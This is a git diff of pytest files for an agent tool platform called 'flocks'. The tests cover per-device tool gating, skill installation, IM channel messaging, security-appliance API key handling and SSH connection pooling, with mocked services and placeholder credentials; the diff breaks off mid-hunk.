diff --git a/tests/tool/test_device_tool_isolation.py b/tests/tool/test_device_tool_isolation.py
index c519222bb..cc8ab2bd3 100644
--- a/tests/tool/test_device_tool_isolation.py
+++ b/tests/tool/test_device_tool_isolation.py
@@ -8,8 +8,8 @@
 Fix: store per-device tool overrides in the ``device_tool_settings`` SQLite
 table (ON DELETE CASCADE cleans up automatically on device removal).  The
 override is checked at ToolRegistry.execute() time, AFTER the shared global
-tool_settings have been applied.  The in-memory ToolInfo.enabled remains a
-global/shared concept; per-device gates live exclusively in the execution path.
+tool_settings have been applied.  A per-device ``enabled=False`` row disables
+only that device; switch-on removes the row and follows global state.
 """
 
 from __future__ import annotations
@@ -319,15 +319,11 @@ async def _activate(did: str):
         )
 
         # Apply per-device DB setting.
-        from flocks.tool.device.store import (
-            delete_device_tool_setting,
-            set_device_tool_enabled,
-        )
+        from flocks.tool.device.store import set_device_tool_enabled
+
         await _insert_stub_device(device_id, storage_key)
-        if per_device_enabled is False:
-            await set_device_tool_enabled(device_id, tool_name, False)
-        elif per_device_enabled is True:
-            await delete_device_tool_setting(device_id, tool_name)
+        if per_device_enabled is not None:
+            await set_device_tool_enabled(device_id, tool_name, per_device_enabled)
 
         return await ToolRegistry.execute(tool_name, device_id=device_id)
 
@@ -378,15 +374,43 @@ async def test_per_device_disable_does_not_affect_other_device(
             "share the same storage_key (same plugin version)."
         )
 
-    async def test_global_disable_still_blocks_all_devices(
+    async def test_global_disable_still_blocks_without_per_device_enable(
         self, monkeypatch, db_env, isolated_registry
     ):
-        """Global tool_settings (enabled=False in registry) must still block ALL devices."""
-        tool = _device_tool("sangfor_af_login", "sangfor_af_v8_0_106", enabled=False)
-        monkeypatch.setattr(
-            "flocks.tool.registry.ToolRegistry.get", lambda _name: tool
+        """Global disabled state still blocks when the device has no override."""
+        result = await self._run_tool(
+            monkeypatch,
+            db_env,
+            storage_key="sangfor_af_v8_0_106",
+            device_id=str(uuid.uuid4()),
+            enabled_in_registry=False,
+            per_device_enabled=None,
         )
+        assert result.success is False
+        assert "disabled" in (result.error or "").lower()
 
-        result = await ToolRegistry.execute("sangfor_af_login", device_id=str(uuid.uuid4()))
+    async def test_legacy_per_device_enable_does_not_override_disabled_registry_tool(
+        self, monkeypatch, db_env, isolated_registry
+    ):
+        """Historical enabled=True rows must not bypass global disabled state."""
+        result = await self._run_tool(
+            monkeypatch,
+            db_env,
+            storage_key="sangfor_af_v8_0_106",
+            device_id=str(uuid.uuid4()),
+            enabled_in_registry=False,
+            per_device_enabled=True,
+        )
         assert result.success is False
         assert "disabled" in (result.error or "").lower()
+
+    async def test_device_tool_failures_do_not_disable_shared_tool(self):
+        tool = _device_tool("sangfor_af_login", "sangfor_af_v8_0_106", enabled=True)
+
+        for _ in range(ToolRegistry._failure_disable_threshold):
+            disabled = ToolRegistry._record_failure(
+                tool, {"device_id": "dev-a"}, "Request failed: 502 Bad Gateway"
+            )
+
+        assert disabled is False
+        assert tool.info.enabled is True
diff --git a/tests/tool/test_flocks_skills.py b/tests/tool/test_flocks_skills.py
index fe6c36cdd..8b5d585da 100644
--- a/tests/tool/test_flocks_skills.py
+++ b/tests/tool/test_flocks_skills.py
@@ -72,14 +72,27 @@ async def test_all_allowed_subcommands_accepted():
     )
 
     proc = make_proc(stdout=b"ok", returncode=0)
+    from flocks.skill.installer import SkillInstallResult
 
     with (
         patch("flocks.tool.skill.flocks_skills._flocks_executable", return_value="/usr/local/bin/flocks"),
         patch("flocks.tool.skill.flocks_skills.asyncio.create_subprocess_exec", return_value=proc),
+        patch(
+            "flocks.skill.installer.SkillInstaller.install_from_source",
+            AsyncMock(
+                return_value=SkillInstallResult(
+                    success=True,
+                    skill_name="demo",
+                    location="/tmp/demo/SKILL.md",
+                    message="installed",
+                )
+            ),
+        ),
     ):
         for sub in _ALLOWED_SUBCOMMANDS:
             ctx = make_ctx()
-            result = await flocks_skills(ctx, subcommand=sub, args="")
+            args = "github:owner/repo/demo" if sub == "install" else ""
+            result = await flocks_skills(ctx, subcommand=sub, args=args)
             assert result.success is True, f"subcommand {sub!r} should succeed"
             if sub in _READ_ONLY_SUBCOMMANDS:
                 ctx.ask.assert_not_called()
@@ -159,12 +172,12 @@ async def test_remove_appends_yes_for_non_interactive_tool_calls():
 @pytest.mark.asyncio
 async def test_nonzero_exit_returns_failure():
     from flocks.tool.skill.flocks_skills import flocks_skills
+    from flocks.skill.installer import SkillInstallResult
 
     ctx = make_ctx()
-    proc = make_proc(stderr=b"skill not found\n", returncode=1)
-    with (
-        patch("flocks.tool.skill.flocks_skills._flocks_executable", return_value="/usr/bin/flocks"),
-        patch("flocks.tool.skill.flocks_skills.asyncio.create_subprocess_exec", return_value=proc),
+    with patch(
+        "flocks.skill.installer.SkillInstaller.install_from_source",
+        AsyncMock(return_value=SkillInstallResult(success=False, error="skill not found")),
     ):
         result = await flocks_skills(ctx, subcommand="install", args="github:bad/source")
 
@@ -174,7 +187,29 @@ async def test_nonzero_exit_returns_failure():
 
 
 @pytest.mark.asyncio
-async def test_timeout_kills_process():
+async def test_install_timeout_returns_failure():
+    from flocks.tool.skill.flocks_skills import flocks_skills
+    from flocks.skill.installer import SkillInstallResult
+
+    ctx = make_ctx()
+    with patch(
+        "flocks.skill.installer.SkillInstaller.install_from_source",
+        AsyncMock(
+            return_value=SkillInstallResult(
+                success=False,
+                error="Command timed out after 45s",
+            )
+        ),
+    ):
+        result = await flocks_skills(ctx, subcommand="install", args="clawhub:slow-skill")
+
+    assert result.success is False
+    assert "timed out" in (result.error or "").lower()
+    ctx.ask.assert_called_once()
+
+
+@pytest.mark.asyncio
+async def test_remove_timeout_kills_process():
     from flocks.tool.skill.flocks_skills import flocks_skills
 
     ctx = make_ctx()
@@ -187,7 +222,7 @@ async def test_timeout_kills_process():
         patch("flocks.tool.skill.flocks_skills._flocks_executable", return_value="/usr/bin/flocks"),
         patch("flocks.tool.skill.flocks_skills.asyncio.create_subprocess_exec", return_value=proc),
     ):
-        result = await flocks_skills(ctx, subcommand="install", args="clawhub:slow-skill")
+        result = await flocks_skills(ctx, subcommand="remove", args="old-skill")
 
     assert result.success is False
     assert "timed out" in (result.error or "").lower()
diff --git a/tests/tool/test_im_send_message.py b/tests/tool/test_im_send_message.py
new file mode 100644
index 000000000..72df25a42
--- /dev/null
+++ b/tests/tool/test_im_send_message.py
@@ -0,0 +1,186 @@
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.tool.channel.im_send_message import (
+    _Candidate,
+    _normalize_channel_type,
+    im_send_message,
+)
+from flocks.tool.registry import ToolContext, ToolRegistry, ToolResult
+
+
+def _ctx(session_id: str = "ses_current") -> ToolContext:
+    return ToolContext(session_id=session_id, message_id="msg_1")
+
+
+def _candidate(session_id: str = "ses_target", channel_id: str = "feishu") -> _Candidate:
+    return _Candidate(
+        session_id=session_id,
+        channel_id=channel_id,
+        account_id="default",
+        chat_type="group",
+        chat_id="chat_1",
+        title="Feishu project chat",
+        last_message_at=100.0,
+    )
+
+
+def test_im_send_message_is_registered() -> None:
+    tool = ToolRegistry.get("im_send_message")
+
+    assert tool is not None
+    schema = tool.info.get_schema()
+    assert "message" in schema.properties
+    assert "resolve_only" in schema.properties
+    assert "session_id" not in schema.required
+
+
+def test_im_send_message_normalizes_weixin_aliases() -> None:
+    assert _normalize_channel_type("weixin") == "weixin"
+    assert _normalize_channel_type("微信") == "weixin"
+    assert _normalize_channel_type("wechat") == "weixin"
+    assert _normalize_channel_type("wx") == "weixin"
+
+
+def test_im_send_message_normalizes_wecom_aliases() -> None:
+    assert _normalize_channel_type("wecom") == "wecom"
+    assert _normalize_channel_type("企业微信") == "wecom"
+    assert _normalize_channel_type("企微") == "wecom"
+    assert _normalize_channel_type("wechat_work") == "wecom"
+    assert _normalize_channel_type("wxwork") == "wecom"
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_requires_message_unless_resolve_only() -> None:
+    result = await im_send_message(_ctx(), session_id="ses_target")
+
+    assert result.success is False
+    assert "message is required" in (result.error or "")
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_resolve_only_returns_target() -> None:
+    candidate = _candidate()
+
+    with patch(
+        "flocks.tool.channel.im_send_message._list_candidates",
+        AsyncMock(return_value=[candidate]),
+    ):
+        result = await im_send_message(
+            _ctx(),
+            session_id="ses_target",
+            resolve_only=True,
+        )
+
+    assert result.success is True
+    assert "session_id=ses_target" in str(result.output)
+    assert result.metadata["target"]["channel_id"] == "feishu"
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_reuses_channel_message_after_resolution() -> None:
+    candidate = _candidate()
+    send_result = ToolResult(success=True, output="sent")
+
+    with patch(
+        "flocks.tool.channel.im_send_message._list_candidates",
+        AsyncMock(return_value=[candidate]),
+    ), patch(
+        "flocks.tool.channel.channel_message.channel_message",
+        AsyncMock(return_value=send_result),
+    ) as channel_message:
+        result = await im_send_message(
+            _ctx(),
+            message="hello",
+            session_id="ses_target",
+        )
+
+    assert result is send_result
+    channel_message.assert_awaited_once()
+    _, kwargs = channel_message.await_args
+    assert kwargs["session_id"] == "ses_target"
+    assert kwargs["channel_type"] == "feishu"
+    assert kwargs["account_id"] == "default"
+    assert kwargs["chat_id"] == "chat_1"
+    assert kwargs["message"] == "hello"
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_uses_current_im_session_by_default() -> None:
+    candidate = _candidate(session_id="ses_current", channel_id="wecom")
+    send_result = ToolResult(success=True, output="sent")
+
+    with patch(
+        "flocks.tool.channel.im_send_message._list_candidates",
+        AsyncMock(return_value=[candidate]),
+    ), patch(
+        "flocks.tool.channel.channel_message.channel_message",
+        AsyncMock(return_value=send_result),
+    ) as channel_message:
+        result = await im_send_message(_ctx(), message="hello")
+
+    assert result is send_result
+    _, kwargs = channel_message.await_args
+    assert kwargs["session_id"] == "ses_current"
+    assert kwargs["channel_type"] == "wecom"
+    assert kwargs["account_id"] == "default"
+    assert kwargs["chat_id"] == "chat_1"
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_asks_when_multiple_targets_match() -> None:
+    first = _candidate(session_id="ses_first", channel_id="feishu")
+    second = _candidate(session_id="ses_second", channel_id="wecom")
+    question_result = ToolResult(
+        success=True,
+        output="answered",
+        metadata={"answers": [[second.label]]},
+    )
+    send_result = ToolResult(success=True, output="sent")
+
+    with patch(
+        "flocks.tool.channel.im_send_message._list_candidates",
+        AsyncMock(return_value=[first, second]),
+    ), patch(
+        "flocks.tool.channel.im_send_message._ask_user_to_choose",
+        AsyncMock(return_value=question_result),
+    ) as ask_user, patch(
+        "flocks.tool.channel.channel_message.channel_message",
+        AsyncMock(return_value=send_result),
+    ) as channel_message:
+        result = await im_send_message(_ctx(session_id="web_session"), message="hello")
+
+    assert result is send_result
+    ask_user.assert_awaited_once()
+    _, kwargs = channel_message.await_args
+    assert kwargs["session_id"] == "ses_second"
+    assert kwargs["channel_type"] == "wecom"
+    assert kwargs["account_id"] == "default"
+    assert kwargs["chat_id"] == "chat_1"
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_stops_when_channel_question_is_deferred() -> None:
+    first = _candidate(session_id="ses_first", channel_id="feishu")
+    second = _candidate(session_id="ses_second", channel_id="wecom")
+    question_result = ToolResult(
+        success=True,
+        output="Question sent to the IM channel as plain text.",
+        metadata={"deferred": True, "channel_session": True},
+    )
+
+    with patch(
+        "flocks.tool.channel.im_send_message._list_candidates",
+        AsyncMock(return_value=[first, second]),
+    ), patch(
+        "flocks.tool.channel.im_send_message._ask_user_to_choose",
+        AsyncMock(return_value=question_result),
+    ), patch(
+        "flocks.tool.channel.channel_message.channel_message",
+        AsyncMock(),
+    ) as channel_message:
+        result = await im_send_message(_ctx(session_id="ses_channel"), message="hello")
+
+    assert result is question_result
+    channel_message.assert_not_awaited()
diff --git a/tests/tool/test_ngtip_api_tool.py b/tests/tool/test_ngtip_api_tool.py
index 6ae2dd94a..85ec29c4b 100644
--- a/tests/tool/test_ngtip_api_tool.py
+++ b/tests/tool/test_ngtip_api_tool.py
@@ -14,7 +14,7 @@ def _load_tool(yaml_name: str):
         / ".flocks"
         / "plugins"
         / "tools"
-        / "api"
+        / "device"
         / "ngtip_v5_1_5"
         / yaml_name
     )
@@ -62,6 +62,13 @@ def post(self, url, **kwargs):
         return self._responses.pop(0)
 
 
+def _secret_get(values: dict[str, str]):
+    def _get(name: str):
+        return values.get(name)
+
+    return _get
+
+
 @pytest.mark.asyncio
 async def test_ngtip_query_uses_ssl_false_by_default():
     tool = _load_tool("ngtip_query.yaml")
@@ -76,14 +83,17 @@ async def test_ngtip_query_uses_ssl_false_by_default():
         ]
     )
     mock_secret_manager = MagicMock()
-    mock_secret_manager.get.return_value = "apikey-1"
+    mock_secret_manager.get.side_effect = _secret_get(
+        {"ngtip_query_apikey": "query-key", "legacy-key": "legacy-key"}
+    )
 
     with (
         patch("flocks.security.get_secret_manager", return_value=mock_secret_manager),
         patch(
             "flocks.config.config_writer.ConfigWriter.get_api_service_raw",
             return_value={
-                "apiKey": "{secret:ngtip_apikey}",
+                "queryApiKey": "{secret:ngtip_query_apikey}",
+                "apiKey": "{secret:legacy-key}",
                 "query_base_url": "https://ngtip-query.local:8090",
             },
         ),
@@ -99,7 +109,7 @@ async def test_ngtip_query_uses_ssl_false_by_default():
     method, url, kwargs = fake_session.calls[0]
     assert method == "GET"
     assert url == "https://ngtip-query.local:8090/tip_api/v5/ip"
-    assert kwargs["params"] == {"apikey": "apikey-1", "resource": "8.8.8.8"}
+    assert kwargs["params"] == {"apikey": "query-key", "resource": "8.8.8.8"}
     assert kwargs["ssl"] is False
 
 
@@ -118,14 +128,17 @@ async def test_ngtip_platform_honors_verify_ssl_true():
         ]
     )
     mock_secret_manager = MagicMock()
-    mock_secret_manager.get.return_value = "apikey-1"
+    mock_secret_manager.get.side_effect = _secret_get(
+        {"ngtip_platform_apikey": "platform-key", "legacy-key": "legacy-key"}
+    )
 
     with (
         patch("flocks.security.get_secret_manager", return_value=mock_secret_manager),
         patch(
             "flocks.config.config_writer.ConfigWriter.get_api_service_raw",
             return_value={
-                "apiKey": "{secret:ngtip_apikey}",
+                "platformApiKey": "{secret:ngtip_platform_apikey}",
+                "apiKey": "{secret:legacy-key}",
                 "base_url": "https://ngtip.local",
                 "verify_ssl": True,
             },
@@ -144,8 +157,46 @@ async def test_ngtip_platform_honors_verify_ssl_true():
     assert method == "POST"
     assert url == "https://ngtip.local/tip/v5/add_user"
     assert kwargs["json"] == {
-        "apikey": "apikey-1",
+        "apikey": "platform-key",
         "username": "alice",
         "roles": ["admin"],
     }
     assert kwargs["ssl"] is True
+
+
+@pytest.mark.asyncio
+async def test_ngtip_uses_legacy_apikey_as_fallback():
+    tool = _load_tool("ngtip_query.yaml")
+    fake_session = _FakeSession(
+        [
+            _FakeResponse(
+                json_payload={
+                    "response_code": 0,
+                    "data": {"resource": "8.8.8.8", "intelligence": []},
+                }
+            )
+        ]
+    )
+    mock_secret_manager = MagicMock()
+    mock_secret_manager.get.side_effect = _secret_get({"ngtip_apikey": "legacy-key"})
+
+    with (
+        patch("flocks.security.get_secret_manager", return_value=mock_secret_manager),
+        patch(
+            "flocks.config.config_writer.ConfigWriter.get_api_service_raw",
+            return_value={
+                "apiKey": "{secret:ngtip_apikey}",
+                "query_base_url": "https://ngtip-query.local:8090",
+            },
+        ),
+        patch("aiohttp.ClientSession", return_value=fake_session),
+    ):
+        result = await tool.handler(
+            ToolContext(session_id="test", message_id="test"),
+            action="query_ip",
+            resource="8.8.8.8",
+        )
+
+    assert result.success is True
+    _, _, kwargs = fake_session.calls[0]
+    assert kwargs["params"]["apikey"] == "legacy-key"
diff --git a/tests/tool/test_onesig_api_tool.py b/tests/tool/test_onesig_api_tool.py
index 1f7441db3..ee8f85b46 100644
--- a/tests/tool/test_onesig_api_tool.py
+++ b/tests/tool/test_onesig_api_tool.py
@@ -43,7 +43,7 @@
     / ".flocks"
     / "plugins"
     / "tools"
-    / "api"
+    / "device"
     / "onesig_v2_5_3_D20260321"
     / "onesig.handler.py"
 )
@@ -115,6 +115,28 @@ def test_default_verify_ssl_is_off_for_private_deployments(handler):
     assert handler.DEFAULT_VERIFY_SSL is False
 
 
+def test_resolve_runtime_config_uses_current_open_box_defaults(handler, monkeypatch):
+    monkeypatch.delenv("ONESIG_API_PREFIX", raising=False)
+    monkeypatch.delenv("ONESIG_OAEP_HASH", raising=False)
+    raw_service = {
+        "base_url": "https://onesig.example.local/",
+        "username": "admin",
+        "password": "supersecret",
+    }
+    secret_manager = MagicMock()
+    secret_manager.get.return_value = None
+
+    with (
+        patch.object(handler.ConfigWriter, "get_api_service_raw", return_value=raw_service),
+        patch.object(handler, "_get_secret_manager", return_value=secret_manager),
+    ):
+        config = handler._resolve_runtime_config()
+
+    assert config.api_prefix == ""
+    assert config.oaep_hash == "sha256"
+    assert config.build_url("/v3/captcha") == "https://onesig.example.local/v3/captcha"
+
+
 # ---------------------------------------------------------------------------
 # _ssl_context: bool -> aiohttp ssl arg shape
 # ---------------------------------------------------------------------------
diff --git a/tests/tool/test_question_channel.py b/tests/tool/test_question_channel.py
new file mode 100644
index 000000000..50d5b6fee
--- /dev/null
+++ b/tests/tool/test_question_channel.py
@@ -0,0 +1,145 @@
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.tool.registry import ToolContext
+from flocks.tool.system import question as question_module
+from flocks.tool.system.question import normalize_question_option, question_tool
+
+
+def test_normalize_question_option_accepts_common_llm_shapes() -> None:
+    assert normalize_question_option({"value": "NVD", "desc": "Public CVE feed"}) == {
+        "label": "NVD",
+        "description": "Public CVE feed",
+    }
+    assert normalize_question_option({"text": "Internal scanner"}) == {
+        "label": "Internal scanner",
+        "description": "",
+    }
+    assert normalize_question_option({"description": "Only descriptive text"}) == {
+        "label": "Only descriptive text",
+        "description": "",
+    }
+    assert normalize_question_option({"label": ""}) is None
+
+
+@pytest.mark.asyncio
+async def test_question_tool_falls_back_to_text_when_choice_has_no_valid_options(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    captured_questions: list[dict] = []
+
+    async def fake_handler(_session_id: str, questions: list[dict]) -> list[list[str]]:
+        captured_questions.extend(questions)
+        return [["manual answer"]]
+
+    monkeypatch.setattr(question_module, "_question_handler", fake_handler)
+    monkeypatch.setattr(question_module, "_send_channel_question_if_applicable", AsyncMock(return_value=None))
+
+    with patch(
+        "flocks.session.goal.GoalManager.record_initial_clarification",
+        AsyncMock(),
+    ) as record_clarification:
+        result = await question_module.question_tool(
+            ToolContext(session_id="ses_question_fallback", message_id="msg_1", call_id="call_1"),
+            questions=[
+                {
+                    "question": "漏洞数据源用什么?",
+                    "type": "choice",
+                    "options": [{"label": ""}],
+                }
+            ],
+        )
+
+    assert result.success is True
+    assert captured_questions[0]["type"] == "text"
+    assert captured_questions[0]["options"] == []
+    record_clarification.assert_awaited_once_with(
+        "ses_question_fallback",
+        captured_questions,
+        [["manual answer"]],
+        message_id="msg_1",
+        call_id="call_1",
+    )
+
+
+@pytest.mark.asyncio
+async def test_question_tool_preserves_custom_flag(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    captured_questions: list[dict] = []
+
+    async def fake_handler(_session_id: str, questions: list[dict]) -> list[list[str]]:
+        captured_questions.extend(questions)
+        return [["NVD"]]
+
+    monkeypatch.setattr(question_module, "_question_handler", fake_handler)
+    monkeypatch.setattr(question_module, "_send_channel_question_if_applicable", AsyncMock(return_value=None))
+
+    with patch(
+        "flocks.session.goal.GoalManager.record_initial_clarification",
+        AsyncMock(),
+    ):
+        result = await question_module.question_tool(
+            ToolContext(session_id="ses_question_custom", message_id="msg_1", call_id="call_1"),
+            questions=[
+                {
+                    "question": "漏洞数据源用什么?",
+                    "type": "choice",
+                    "custom": False,
+                    "options": [{"label": "NVD"}],
+                }
+            ],
+        )
+
+    assert result.success is True
+    assert captured_questions[0]["type"] == "choice"
+    assert captured_questions[0]["custom"] is False
+
+
+@pytest.mark.asyncio
+async def test_question_tool_sends_plain_text_for_channel_session() -> None:
+    binding = SimpleNamespace(
+        channel_id="feishu",
+        account_id="default",
+        chat_id="chat_1",
+        chat_type=SimpleNamespace(value="group"),
+        thread_id=None,
+        session_id="ses_channel",
+    )
+    svc = SimpleNamespace(
+        get_bindings_by_session=AsyncMock(return_value=[binding]),
+    )
+
+    with patch(
+        "flocks.channel.inbound.session_binding.SessionBindingService",
+        return_value=svc,
+    ), patch(
+        "flocks.channel.outbound.deliver.OutboundDelivery.deliver",
+        AsyncMock(return_value=[]),
+    ) as deliver:
+        result = await question_tool(
+            ToolContext(session_id="ses_channel", message_id="msg_1"),
+            questions=[
+                {
+                    "question": "请选择目标 session",
+                    "type": "choice",
+                    "options": [
+                        {"label": "研发群", "description": "session_id=ses_1"},
+                        {"label": "运维群", "description": "session_id=ses_2"},
+                    ],
+                }
+            ],
+        )
+
+    assert result.success is True
+    assert result.metadata["deferred"] is True
+    assert result.metadata["channel_session"] is True
+    deliver.assert_awaited_once()
+    outbound_ctx = deliver.await_args.args[0]
+    assert outbound_ctx.channel_id == "feishu"
+    assert outbound_ctx.to == "chat_1"
+    assert "请选择目标 session" in outbound_ctx.text
+    assert "1. 研发群 - session_id=ses_1" in outbound_ctx.text
+    assert "2. 运维群 - session_id=ses_2" in outbound_ctx.text
diff --git a/tests/tool/test_sangfor_sip_handler.py b/tests/tool/test_sangfor_sip_handler.py
new file mode 100644
index 000000000..b3dc0cb02
--- /dev/null
+++ b/tests/tool/test_sangfor_sip_handler.py
@@ -0,0 +1,104 @@
+"""Targeted tests for the Sangfor SIP plugin handler."""
+
+from __future__ import annotations
+
+import asyncio
+import importlib.util
+import sys
+from pathlib import Path
+from unittest.mock import patch
+
+import pytest
+
+_HANDLER_PATH = (
+    Path(__file__).resolve().parents[2]
+    / ".flocks"
+    / "plugins"
+    / "tools"
+    / "device"
+    / "sangfor_sip_v92"
+    / "sangfor_sip.handler.py"
+)
+
+
+def _load_handler_module():
+    if not _HANDLER_PATH.exists():
+        pytest.skip(f"Sangfor SIP handler not present at {_HANDLER_PATH}")
+    spec = importlib.util.spec_from_file_location(
+        "_sangfor_sip_handler_under_test",
+        str(_HANDLER_PATH),
+    )
+    assert spec and spec.loader
+    module = importlib.util.module_from_spec(spec)
+    sys.modules[spec.name] = module
+    spec.loader.exec_module(module)
+    return module
+
+
+@pytest.fixture(scope="module")
+def handler():
+    return _load_handler_module()
+
+
+def test_run_returns_payload_via_output_field(handler):
+    payload = {"code": 0, "data": [{"id": "asset-1"}]}
+
+    async def _fake_handler(cfg, session, params):
+        assert params == {"max_count": 10}
+        return payload
+
+    cfg = handler.RuntimeConfig(
+        base_url="https://sip.test:7443",
+        timeout=5,
+        platform_name="platform",
+        username="user",
+        password="password",
+        verify_ssl=False,
+    )
+
+    with (
+        patch.object(handler, "_resolve_runtime_config", return_value=cfg),
+        patch.dict(handler._ACTION_MAP, {"compat_check": _fake_handler}),
+    ):
+        result = asyncio.run(handler._run("compat_check", {"max_count": 10}))
+
+    assert result.success is True
+    assert result.error is None
+    assert result.output == payload
+
+
+def test_success_result_falls_back_to_data_for_legacy_constructor(handler):
+    class LegacyToolResult:
+        def __init__(self, *, success, data=None, error=None):
+            self.success = success
+            self.data = data
+            self.error = error
+
+    payload = {"legacy": True}
+
+    with patch.object(handler, "ToolResult", LegacyToolResult):
+        result = handler._success_result(payload)
+
+    assert result.success is True
+    assert result.error is None
+    assert result.data == payload
+
+
+def test_success_result_uses_declared_data_field_for_legacy_model(handler):
+    class LegacyToolResult:
+        __fields__ = {"success": object(), "data": object(), "error": object()}
+
+        def __init__(self, **kwargs):
+            assert "output" not in kwargs
+            self.success = kwargs["success"]
+            self.data = kwargs.get("data")
+            self.error = kwargs.get("error")
+
+    payload = {"legacy_field": True}
+
+    with patch.object(handler, "ToolResult", LegacyToolResult):
+        result = handler._success_result(payload)
+
+    assert result.success is True
+    assert result.error is None
+    assert result.data == payload
diff --git a/tests/tool/test_ssh_utils_pool.py b/tests/tool/test_ssh_utils_pool.py
new file mode 100644
index 000000000..7937e8c0e
--- /dev/null
+++ b/tests/tool/test_ssh_utils_pool.py
@@ -0,0 +1,108 @@
+import asyncio
+from types import SimpleNamespace
+
+import pytest
+
+from flocks.tool.security import ssh_utils
+
+
+class DummyConnection:
+    def __init__(self, host: str) -> None:
+        self.host = host
+        self.closed = False
+
+    def close(self) -> None:
+        self.closed = True
+
+    async def run(self, command: str, check: bool = False) -> SimpleNamespace:
+        return SimpleNamespace(exit_status=0, stdout=f"{self.host}:{command}", stderr="")
+
+
+@pytest.mark.asyncio
+async def test_ssh_pool_evicts_least_recent_idle_connection(monkeypatch: pytest.MonkeyPatch) -> None:
+    created: list[DummyConnection] = []
+
+    async def fake_connect(**kwargs):
+        conn = DummyConnection(kwargs["host"])
+        created.append(conn)
+        return conn
+
+    monkeypatch.setattr(ssh_utils.asyncssh, "connect", fake_connect)
+    pool = ssh_utils.SSHConnectionPool(max_connections=2, idle_ttl_s=3600)
+
+    for host in ("host-1", "host-2", "host-3"):
+        await pool.get_connection("session", host, 22, "root", None, None)
+        await pool.release_connection("session", host, 22, "root")
+
+    assert pool.stats()["connections"] == 2
+    assert pool.stats()["locks"] == 2
+    assert created[0].closed is True
+    assert created[1].closed is False
+    assert created[2].closed is False
+
+
+@pytest.mark.asyncio
+async def test_ssh_pool_prunes_idle_connections_by_ttl(monkeypatch: pytest.MonkeyPatch) -> None:
+    created: list[DummyConnection] = []
+
+    async def fake_connect(**kwargs):
+        conn = DummyConnection(kwargs["host"])
+        created.append(conn)
+        return conn
+
+    monkeypatch.setattr(ssh_utils.asyncssh, "connect", fake_connect)
+    pool = ssh_utils.SSHConnectionPool(max_connections=10, idle_ttl_s=0.01)
+
+    await pool.get_connection("session", "host-1", 22, "root", None, None)
+    await pool.release_connection("session", "host-1", 22, "root")
+    await asyncio.sleep(0.02)
+    await pool.get_connection("session", "host-2", 22, "root", None, None)
+
+    assert created[0].closed is True
+    assert pool.stats()["connections"] == 1
+    assert pool.stats()["locks"] == 1
+
+
+@pytest.mark.asyncio
+async def test_ssh_pool_invalidate_closes_connection(monkeypatch: pytest.MonkeyPatch) -> None:
+    async def fake_connect(**kwargs):
+        return DummyConnection(kwargs["host"])
+
+    monkeypatch.setattr(ssh_utils.asyncssh, "connect", fake_connect)
+    pool = ssh_utils.SSHConnectionPool(max_connections=10, idle_ttl_s=3600)
+
+    conn = await pool.get_connection("session", "host-1", 22, "root", None, None)
+    await pool.invalidate_connection("session", "host-1", 22, "root")
+
+    assert conn.closed is True
+    assert pool.stats()["connections"] == 0
+    assert pool.stats()["locks"] == 0
+
+
+@pytest.mark.asyncio
+async def test_execute_ssh_command_releases_connection_after_run(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    async def fake_connect(**kwargs):
+        return DummyConnection(kwargs["host"])
+
+    pool = ssh_utils.SSHConnectionPool(max_connections=10, idle_ttl_s=3600)
+    monkeypatch.setattr(ssh_utils.asyncssh, "connect", fake_connect)
+    monkeypatch.setattr(ssh_utils, "_pool", pool)
+
+    exit_code, stdout, stderr = await ssh_utils.execute_ssh_command(
+        host="host-1",
+        command="uptime",
+        username="root",
+        port=22,
+        key_path=None,
+        password=None,
+        timeout_s=5,
+        session_id="session",
+    )
+
+    assert exit_code == 0
+    assert stdout == "host-1:uptime"
+    assert stderr == ""
+    assert pool.stats()["connections"] == 1
+    assert pool.stats()["active_connections"] == 0
diff --git a/tests/tool/test_tool_plugin.py b/tests/tool/test_tool_plugin.py
index aa10e2615..23e20a2ad 100644
--- a/tests/tool/test_tool_plugin.py
+++ b/tests/tool/test_tool_plugin.py
@@ -874,7 +874,10 @@ def _fake_plugin_load() -> None:
                     handler=lambda ctx, **kwargs: None,
                 ))
 
-            with patch("flocks.plugin.PluginLoader.load_all", side_effect=_fake_plugin_load):
+            with patch(
+                "flocks.plugin.PluginLoader.load_extension",
+                side_effect=lambda *_args, **_kwargs: _fake_plugin_load(),
+            ):
                 ToolRegistry._load_plugin_tools()
 
             assert ToolRegistry._plugin_tool_names == ["base64_encode"]
@@ -884,6 +887,26 @@ def _fake_plugin_load() -> None:
             ToolRegistry._plugin_tool_names = old_plugin_names
             ToolRegistry._enabled_defaults = old_enabled_defaults
 
+    def test_load_plugin_tools_loads_legacy_package_entry_points(self):
+        from flocks.tool.registry import ToolRegistry
+
+        old_tools = ToolRegistry._tools.copy()
+        old_plugin_names = ToolRegistry._plugin_tool_names.copy()
+        old_enabled_defaults = ToolRegistry._enabled_defaults.copy()
+        try:
+            ToolRegistry._tools = {}
+            ToolRegistry._plugin_tool_names = []
+            ToolRegistry._enabled_defaults = {}
+
+            with patch("flocks.plugin.PluginLoader.load_extension") as load_extension:
+                ToolRegistry._load_plugin_tools()
+
+            load_extension.assert_called_once_with("TOOLS", load_entry_points=True)
+        finally:
+            ToolRegistry._tools = old_tools
+            ToolRegistry._plugin_tool_names = old_plugin_names
+            ToolRegistry._enabled_defaults = old_enabled_defaults
+
     def test_load_plugin_tools_marks_project_python_tools_native(self, tmp_path: Path):
         from flocks.tool.registry import ToolRegistry, ToolInfo, ToolCategory, Tool
 
@@ -906,7 +929,10 @@ def _fake_plugin_load() -> None:
                     handler=lambda ctx, **kwargs: None,
                 ))
 
-            with patch("flocks.plugin.PluginLoader.load_all", side_effect=_fake_plugin_load):
+            with patch(
+                "flocks.plugin.PluginLoader.load_extension",
+                side_effect=lambda *_args, **_kwargs: _fake_plugin_load(),
+            ):
                 with patch(
                     "flocks.tool.tool_loader.discover_python_tool_sources",
                     return_value={"project_tool": project_tool_path},
@@ -944,7 +970,10 @@ def _fake_plugin_load() -> None:
                 ))
 
